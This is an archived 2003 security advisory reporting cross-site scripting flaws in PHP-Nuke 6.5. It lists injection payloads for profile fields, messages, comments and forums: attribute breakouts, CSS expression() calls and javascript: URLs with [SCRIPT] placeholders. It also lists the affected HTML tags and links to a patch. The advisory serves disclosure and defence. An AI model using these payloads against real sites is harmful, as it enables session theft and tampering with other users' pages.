logo Home

Untitled Document Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

PHP-Nuke Cross Site Scripting
Date: 2003-04-27

Author : frog frog <leseulfrog@hotmail.com>

Informations :
°°°°°°°°°°°°°°

Language : PHP
Website : http://www.phpnuke.org
Tested Version : 6.5 FINAL
Problem : Cross Site Scripting


Exploit :
°°°°°°°°°
In the website or the email of the profil :
- http://" onclick="[SCRIPT]
(onclick can be replaced by ondblclick, onhelp, onmouseout, onmousemove,...)
- " style="list-style:url(javascript:[SCRIPT]); visibility:hidden;

- " style="zoom:expression([SCRIPT]); visibility:hidden;

etc...


In private messages (not with phpBB), comments, news, forums,... :

<i style="overflow:expression([SCRIPT]);"></i>

<br style="overflow:expression([SCRIPT]);">

<a style="left:expression([SCRIPT]);"></a>

<a style="background:url('javascript:[SCRIPT]');"></a>

<li style="list-style-image:url('javascript:[SCRIPT]');">

<b style="background:url('javascript:[SCRIPT]');"></b>

etc... with :

- <b>
- <i>
- <a>
- <em>
- <br>
- <strong>
- <blockquote>
- <tt>
- <li>
- <ol>
- <ul>


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info


More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/PHP-Nuke-html.txt

frog-m@n



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy